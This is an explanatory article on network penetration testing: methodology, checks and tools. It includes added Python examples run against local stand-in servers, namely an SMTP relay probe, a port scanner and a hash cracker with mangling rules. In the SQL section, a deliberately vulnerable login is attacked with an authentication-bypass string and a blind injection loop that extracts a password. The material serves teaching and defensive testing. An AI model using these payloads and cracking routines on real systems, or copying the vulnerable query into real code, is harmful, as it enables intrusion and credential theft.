Network security is one of the most important areas of security engineering. Network penetration testing, or network pen testing, is the part of an organization's penetration testing procedure that targets its networks and the devices on them.
Network pen testing can be performed in conjunction with other types of penetration tests or planned as a separate part of the security procedures.
The purpose of network security tests is to identify potential threats in Internet connections, corporate networks, VPNs, local networks, wireless access, and cloud systems.
Internet connections, firewalls, routers, switches and hubs, wireless access points, servers, workstations and desktop computers, and IoT devices must all be checked as part of this testing.
Fundamental principles of network security tests
Network penetration testing methodology commonly follows the Penetration Testing Execution Standard (PTES), which specifies seven phases:
- Pre-engagement Interactions
- Intelligence Gathering
- Threat Modeling
- Vulnerability Analysis
- Exploitation
- Post Exploitation
- Reporting
The Information Systems Security Assessment Framework (ISSAF) can also help in designing a comprehensive network security test plan. At the top level it groups the work into three phases: planning and preparation, assessment, and reporting (including clean-up of any artifacts left on the targets).
The following checks are typically part of a network pen test:
- CDP (Cisco Discovery Protocol) spoofing attacks
- DNS enumeration and zone transfer (AXFR) attempts
- SMTP open relay testing
- SNMP reconnaissance (default or weak community strings)
- port security
- brute-force attacks against exposed login services
- encryption testing (weak or outdated ciphers and protocol versions)
- password weakness
- detection of cleartext HTTP where HTTPS should be used
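As an added example that is not part of the original article, here is the SMTP open relay check from the list above, written in Python. It runs offline against a constructed local SMTP server (the server, the domain example.org, and the test addresses are assumptions of the example). An open relay answers 250 to RCPT TO for a recipient outside its own domains when the sender is also outside them; a correctly configured server rejects that with a 5xx code.

```python
import socket
import threading

# Constructed test server: the domain it accepts mail for. A real relay test
# uses a sender and a recipient that are both outside the target's domains.
LOCAL_DOMAIN = "example.org"


def _serve_smtp(conn, open_relay):
    """Minimal constructed SMTP server side: only the verbs the probe sends."""
    with conn:
        f = conn.makefile("rwb", buffering=0)
        f.write(b"220 mail.example.org ESMTP constructed test server\r\n")
        while True:
            raw = f.readline()
            if not raw:
                break
            cmd = raw.decode("ascii", "replace").strip()
            verb = cmd[:4].upper()
            if verb in ("HELO", "EHLO"):
                f.write(b"250 mail.example.org\r\n")
            elif verb == "MAIL":
                f.write(b"250 2.1.0 Ok\r\n")
            elif verb == "RCPT":
                rcpt = cmd.partition(":")[2].strip().strip("<>").lower()
                if open_relay or rcpt.endswith("@" + LOCAL_DOMAIN):
                    f.write(b"250 2.1.5 Ok\r\n")
                else:
                    f.write(b"554 5.7.1 Relay access denied\r\n")
            elif verb == "QUIT":
                f.write(b"221 2.0.0 Bye\r\n")
                break
            else:
                f.write(b"502 5.5.2 Command not implemented\r\n")


def start_fake_smtp(open_relay):
    """Start the constructed server on 127.0.0.1 and return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_serve_smtp, args=(conn, open_relay), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def _read_reply(f):
    """Read one SMTP reply, following '250-' continuation lines; return (code, text)."""
    lines = []
    while True:
        raw = f.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return int(line[:3]), "\n".join(lines)


def check_open_relay(host, port, sender="tester@outside.test",
                     recipient="someone@elsewhere.test", timeout=5.0):
    """Probe whether the server relays mail between two foreign domains.
    Returns (is_open_relay, rcpt_reply). No message is sent: the verdict is
    taken from the RCPT TO reply and the session ends with QUIT."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rwb", buffering=0)
        code, text = _read_reply(f)
        if code != 220:
            return False, text
        f.write(b"EHLO pentest.local\r\n")
        code, _ = _read_reply(f)
        if code != 250:                      # older server: fall back to HELO
            f.write(b"HELO pentest.local\r\n")
            _read_reply(f)
        f.write(("MAIL FROM:<%s>\r\n" % sender).encode("ascii"))
        code, text = _read_reply(f)
        if code != 250:
            return False, text
        f.write(("RCPT TO:<%s>\r\n" % recipient).encode("ascii"))
        code, text = _read_reply(f)
        f.write(b"QUIT\r\n")
        return code == 250, text


if __name__ == "__main__":
    for relay in (True, False):
        port = start_fake_smtp(open_relay=relay)
        print("open_relay=%s ->" % relay, check_open_relay("127.0.0.1", port))
```

The probe stops before DATA, so nothing is queued on the target; on a real engagement run it from outside the organization's network as well as inside, because many servers relay for internal source addresses by design.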
What are the best network penetration testing tools?
Now we will take a closer look at network penetration testing tools. First, we recommend Kali Linux, an open-source Debian-based distribution developed by Offensive Security that focuses on penetration testing and security auditing; it ships with more than 600 tools, many of them specific to network penetration testing.
The OSINT Framework is also helpful for categorizing and collecting open-source information about the network resources in scope. A large number of penetration testing tools are available; below we look at the main ones by type. Among the most popular network penetration testing tools are Nexpose, Nipper, W3AF, Wireshark, and Metasploit.
Penetration Testing Frameworks
The most advanced and widely used testing framework is Metasploit. It can configure and deliver a payload to a target through an exploit module, and its auxiliary modules scan web applications, networks, servers, desktops, and mobile devices.
Network Mapping
Popular network mapping tools are Nmap and Fierce. Between them they cover host discovery, port scanning, operating system detection, application version detection, IP range scanning, and name server discovery (Fierce focuses on the DNS side).
Network Scanning
Popular network scanners and sniffers include Netcat, Unicornscan, OpenVAS, and Nikto. They can work with TCP and UDP connections, analyze reverse and forward DNS records, and scan local and remote ports; note that OpenVAS is a vulnerability scanner and Nikto a web server scanner, so they build on rather than replace the port scan.
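As an added example (not code from the original article or from any of the tools named above), here is the core of what the mapping and scanning sections describe: a concurrent TCP connect() port scan with banner grabbing and a first guess at the service from its greeting. To run offline it starts constructed local listeners that play the role of real daemons; the banners and the service names are assumptions of the example.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_fake_service(banner):
    """Constructed stand-in for a daemon: listens on 127.0.0.1, sends `banner`
    to each client and hangs up. Returns the port so the scan can run offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def closed_port():
    """Reserve and release an ephemeral port so the scan also sees a closed one."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def probe(host, port, timeout=1.0):
    """Full TCP connect() probe (what `nmap -sT` does). Returns (port, state, banner):
    'open' on a completed handshake, 'closed' on RST, 'filtered' on timeout or
    ICMP unreachable. Banner grabbing reads whatever the service volunteers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(0.5)
            try:
                banner = s.recv(256)
            except socket.timeout:
                banner = b""          # open but silent, e.g. HTTP waits for a request
            return port, "open", banner.strip().decode("ascii", "replace")
    except ConnectionRefusedError:
        return port, "closed", ""
    except OSError:                   # timeouts and host/network unreachable
        return port, "filtered", ""


def guess_service(banner):
    """Version detection from the greeting alone (nmap -sV also sends probes)."""
    b = banner.upper()
    if b.startswith("SSH-"):
        return "ssh"
    if b.startswith("220") and ("SMTP" in b or "MAIL" in b):
        return "smtp"
    if b.startswith("220") and "FTP" in b:
        return "ftp"
    if b.startswith("HTTP/"):
        return "http"
    return "unknown"


def scan(host, ports, workers=64, timeout=1.0):
    """Scan `ports` concurrently; returns {port: (state, banner)}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return {port: (state, banner) for port, state, banner in results}


def open_ports(results):
    return sorted(p for p, (state, _) in results.items() if state == "open")


if __name__ == "__main__":
    targets = [start_fake_service(b"SSH-2.0-OpenSSH_9.2\r\n"),
               start_fake_service(b"220 mail.example.org ESMTP Postfix\r\n"),
               closed_port()]
    for port, (state, banner) in sorted(scan("127.0.0.1", targets).items()):
        print(port, state, guess_service(banner), repr(banner))
```

A connect() scan completes the handshake, so it shows up in the target's connection logs; the SYN scan that Nmap uses by default needs raw sockets and is what you would choose when noise matters. The three-way distinction between closed and filtered is what tells you whether a firewall sits in front of the host.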
WiFi Penetration Testing
For WiFi penetration testing, Fluxion, Aircrack-ng, Kismet Wireless, and Yersinia can be used. Aircrack-ng covers packet sniffing and injection and WPA/WPA2-PSK handshake cracking, Kismet is a passive wireless detector and sniffer, Fluxion automates evil-twin attacks and spawns an MDK3 process for deauthentication, and Yersinia targets layer-2 protocols such as 802.1Q VLAN tagging on the wired side. Networks that use 802.1X (enterprise) authentication need the RADIUS/EAP setup tested as well, not just the radio link.
VOIP Penetration Testing
VoIP systems are also an important part to be tested, and several tools support pen testing these devices. For instance, Wireshark can capture VoIP calls and decode the RTP streams, and the Viproy VoIP kit (a set of Metasploit modules) tests SIP/SDP and MSRP for problems in the system.
Cryptography Penetration Testing
Cryptography testing tools (John the Ripper, THC Hydra, findmyhash, RainbowCrack) test how credentials and secrets are protected and help detect sessions that use weak encryption methods. John the Ripper and RainbowCrack crack captured password hashes offline (by dictionary and rule-based attacks, brute force, or precomputed rainbow tables), findmyhash looks hashes up in online databases, and THC Hydra brute-forces logins against live network services in parallel. Together they reveal weak, empty, and reused passwords. Modern crackers use GPUs, so weak, old, and simple hashing methods such as unsalted MD5 or SHA-1 can be compromised quickly.
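The following is an added example, not code from the original article or from John the Ripper: a dictionary attack with John-style mangling rules against a constructed credential dump, run once against unsalted hashes and once against salted ones. The wordlist, the user names and their passwords are all assumptions of the example; the point it makes is why one pass cracks an entire unsalted dump (and exposes users who share a password) while salting forces per-account work.

```python
import hashlib
import os

# Constructed inputs. On an engagement the hashes come from a dumped credential
# store (SAM, /etc/shadow, an application database) and the wordlist from
# rockyou.txt or a list built from the target's own vocabulary.
WORDLIST = ["password", "welcome", "summer", "qwerty", "letmein", "admin"]
DEMO_PASSWORDS = {"alice": "Summer2024", "bob": "p@ssw0rd",
                  "carol": "Summer2024", "dave": "Tr0ub4dor&3"}


def mangle(word):
    """Rule-based candidates in the spirit of John the Ripper's rules:
    case changes, leet substitution, and common suffixes."""
    base = {word, word.capitalize(), word.upper(),
            word.replace("a", "@").replace("e", "3").replace("o", "0")}
    for w in sorted(base):
        yield w
        for suffix in ("1", "123", "!", "2023", "2024"):
            yield w + suffix


def candidates(wordlist):
    yield ""                      # catches empty passwords before any wordlist entry
    for word in wordlist:
        yield from mangle(word)


def crack_unsalted(targets, algo, wordlist=WORDLIST):
    """targets: {label: hexdigest}. One hash computation per candidate serves
    every target, which is why an unsalted dump falls in a single pass and
    why two users with the same password fall together."""
    lookup = {}
    for label, digest in targets.items():
        lookup.setdefault(digest.lower(), []).append(label)
    found = {}
    for cand in candidates(wordlist):
        for label in lookup.get(hashlib.new(algo, cand.encode()).hexdigest(), []):
            found[label] = cand
    return found


def crack_salted(targets, salts, algo, wordlist=WORDLIST):
    """targets: {label: hexdigest of salt||password}, salts: {label: hex salt}.
    Every target needs its own pass over the wordlist, so the work grows with
    the number of accounts; a slow KDF (bcrypt, scrypt, Argon2) multiplies it
    further, which is the point of salting and stretching."""
    found = {}
    for label, digest in targets.items():
        for cand in candidates(wordlist):
            if hashlib.new(algo, (salts[label] + cand).encode()).hexdigest() == digest.lower():
                found[label] = cand
                break
    return found


def make_unsalted_dump(algo="md5", passwords=DEMO_PASSWORDS):
    """Constructed dump of unsalted hashes, the format a legacy app might keep."""
    return {u: hashlib.new(algo, p.encode()).hexdigest() for u, p in passwords.items()}


def make_salted_dump(algo="sha256", passwords=DEMO_PASSWORDS):
    """Constructed dump with a random 8-byte salt per account."""
    salts = {u: os.urandom(8).hex() for u in passwords}
    targets = {u: hashlib.new(algo, (salts[u] + p).encode()).hexdigest()
               for u, p in passwords.items()}
    return targets, salts


if __name__ == "__main__":
    print("unsalted md5:", crack_unsalted(make_unsalted_dump("md5"), "md5"))
    t, s = make_salted_dump("sha256")
    print("salted sha256:", crack_salted(t, s, "sha256"))
```

Only dave survives both runs: his password is outside the rule space, which is the usual finding when a dump is cracked, and the reason the report should list the cracked accounts rather than just a percentage.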
SQL Penetration Testing
SQL databases can also be a target for attacks. Tools such as sqlmap and other SQL injection scanners detect and exploit SQL injection in the applications in front of the database, so the flaws can be fixed before they lead to data leaks.
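As an added example that is not from the original article and not sqlmap's own code, here is the vulnerable pattern sqlmap finds next to its parameterized fix, plus a boolean-based blind extraction of the kind sqlmap automates, run against a constructed in-memory SQLite table (the table, the accounts and the passwords are assumptions of the example).

```python
import sqlite3
import string


def make_db():
    """Constructed in-memory users table standing in for the target database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users (name, password, role) VALUES (?, ?, ?)",
                   [("admin", "s3cret-admin-pw", "admin"), ("alice", "alice-pw", "user")])
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """The query is assembled by string formatting, so user input becomes SQL.
    Deliberately vulnerable: this is the pattern sqlmap looks for."""
    sql = ("SELECT name, role FROM users WHERE name = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Parameterized query: values travel separately from the SQL text, so a
    quote in the input can never close the string literal."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def extract_password_blind(db, user,
                           charset=string.ascii_letters + string.digits + "-_!@#$%^&*.",
                           max_len=64):
    """Boolean-based blind extraction, one character at a time, the way
    sqlmap's technique B works: the only oracle is whether login succeeds.
    The trailing '--' comments out the rest of the original WHERE clause."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = "%s' AND substr(password,%d,1)='%s'--" % (user, pos, ch)
            if login_vulnerable(db, payload, "x") is not None:
                recovered += ch
                break
        else:
            return recovered        # no character matched: past the end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "anyone", "' OR '1'='1"))
    print("same input, parameterized:", login_safe(db, "anyone", "' OR '1'='1"))
    print("blind extraction:", extract_password_blind(db, "admin"))
```

The extraction needs roughly one request per candidate character per position, which is why sqlmap's output is slow on blind injection and why a login endpoint with no rate limiting is worth flagging even before the injection is confirmed.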
Additional tools
Special attention should be paid to collecting information from social networks and other open sources on the Internet, and to the tools that put that information to use against exposed CMS installations and staff:
- WPScan (WordPress vulnerability scanner)
- CMSMap (scanner for common CMS platforms)
- Social Engineering Toolkit (phishing and other social-engineering campaigns)
The complexity of the network penetration test
The difficulty with network pen testing is that every possible point of entry should be checked, so there are a lot of parameters to cover.
In a real attack on an organization's network, the attacker looks for any vulnerability on any device and then, having gained a foothold, moves on to other hosts and collects information inside the network.
This is especially likely when unencrypted protocols are used for authentication, database access, and so on, because credentials can simply be captured on the wire.
Therefore network penetration testing, automated or manual, should be carefully planned and, where possible, should simulate the behavior of a real intrusion.
Only one minor vulnerability in the network can give an attacker the opportunity to penetrate the system and work toward all critical organization resources: “a chain is no stronger than its weakest link”.
Cloud network penetration testing
Network penetration tests on cloud systems must first be coordinated with the cloud provider (some providers have strict requirements and restrictions for this type of testing).
In a cloud penetration test the main objects are usually applications, services, and/or APIs. The provider operates and hardens the underlying network and network devices, so the customer-controlled surface (deployed services, APIs, and the network rules and identities the customer configures) is what the test targets.
Three aspects of the results need to be analyzed:
- Staff's response to testing (did administrators and DevOps notice that a test attack was conducted, and how did they escalate and report it)
- Automated protection system response and possible automatic actions to block intrusion (if used in the current configuration)
- Security Improvement Plan
IoT Network Penetration Testing
An important part of the network penetration test is the analysis of the penetration of IoT devices.
These devices often support critical functions, so unauthorized access carries serious risk in areas such as:
- Medical / Healthcare
- Industrial Control Systems
- Smart Home Automation
- Wearable devices
- Energy/Utility counters
- Automotive
A big challenge in IoT penetration testing is the range of wireless protocols in use (WiFi, Bluetooth, NFC, Zigbee, etc.).
Another difficulty in conducting penetration testing in IoT is the huge number of devices used (from hundreds to hundreds of thousands). The diversity of IoT systems also complicates the task.
In the most common case, the penetration test of an IoT system covers the main components:
- IoT device connection to WiFi or the local network
- A connection from the wireless router to server or cloud system
- Databases and information in the processing systems
- Client-server applications, including user application and API
The same tools, such as the Metasploit framework, port scanners, and traffic analyzers, are used for penetration testing of IoT systems.
Takeaways
Planning regular penetration tests should be a top priority for most organizations.
The main danger of unauthorized entry into the information system from the network is that an attacker can use the access to the system for years and go unnoticed.
And with the development of cloud technologies and mass service systems, millions of users may suffer damage from unauthorized access.
Experience shows that network penetration testing should be carried out continuously for critical functions in organizations. It is better to use several companies, to get wider testing coverage and recommendations from several teams. This practice generally gives more comprehensive results than internal network penetration testing alone.